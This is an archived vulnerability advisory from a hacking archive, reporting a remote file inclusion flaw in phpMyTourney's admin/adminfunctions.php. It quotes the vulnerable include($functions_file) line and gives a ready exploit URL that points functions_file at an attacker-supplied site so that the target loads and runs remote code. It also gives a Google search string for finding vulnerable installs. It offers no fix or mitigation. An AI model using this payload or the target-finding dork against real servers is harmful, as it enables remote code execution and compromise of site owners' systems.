AOH :: HP Unsorted P :: BT-21186.HTM

phpMyTourney adminfunctions.php Remote File Include Vulnerabilities



phpMyTourney adminfunctions.php Remote File Include Vulnerabilities
phpMyTourney adminfunctions.php Remote File Include Vulnerabilities



Hi
a bug in phpMyTourney that allows to us to occur a Remote File Include on a Remote machin.

Bug :


#####################################################################################
#                                                                                   #
#                Islamic Republic Of Iran Security Team                             #
#                                                                                   #
# Www.IrIsT.Ir #
#                                                                                   #
#####################################################################################
#                                                                                   #
# phpMyTourney adminfunctions.php Remote File Include Vulnerabilities               #
#                                                                                   #
# Download......: http:/phpmytourney.sourceforge.net                                #
#                                                                                   #
# file;                                                                             #
# dminfunctions.php                                                                 #
#                                                                                   #
# bug;                                                                              #
#                                                                                   #
# include($functions_file);                                                         #
#                                                                                   #
# Exploit...: http://[site]/[path]/admin/adminfunctions.php?functions_file=[Site]? #
#                                                                                   #
#####################################################################################
# Bug Found.....: IrIsT=99                                                            #
#                                                                                   #
# discovery.....: Am!r (IrIsT=99)                                                     #
#                                                                                   #
# contact.......: IrIsT.Ir[at]Gmail.Com                                             #
#                                                                                   #
# Google Search.: "Powered By phpMyTourney"                                         #
#                                                                                   #
#####################################################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.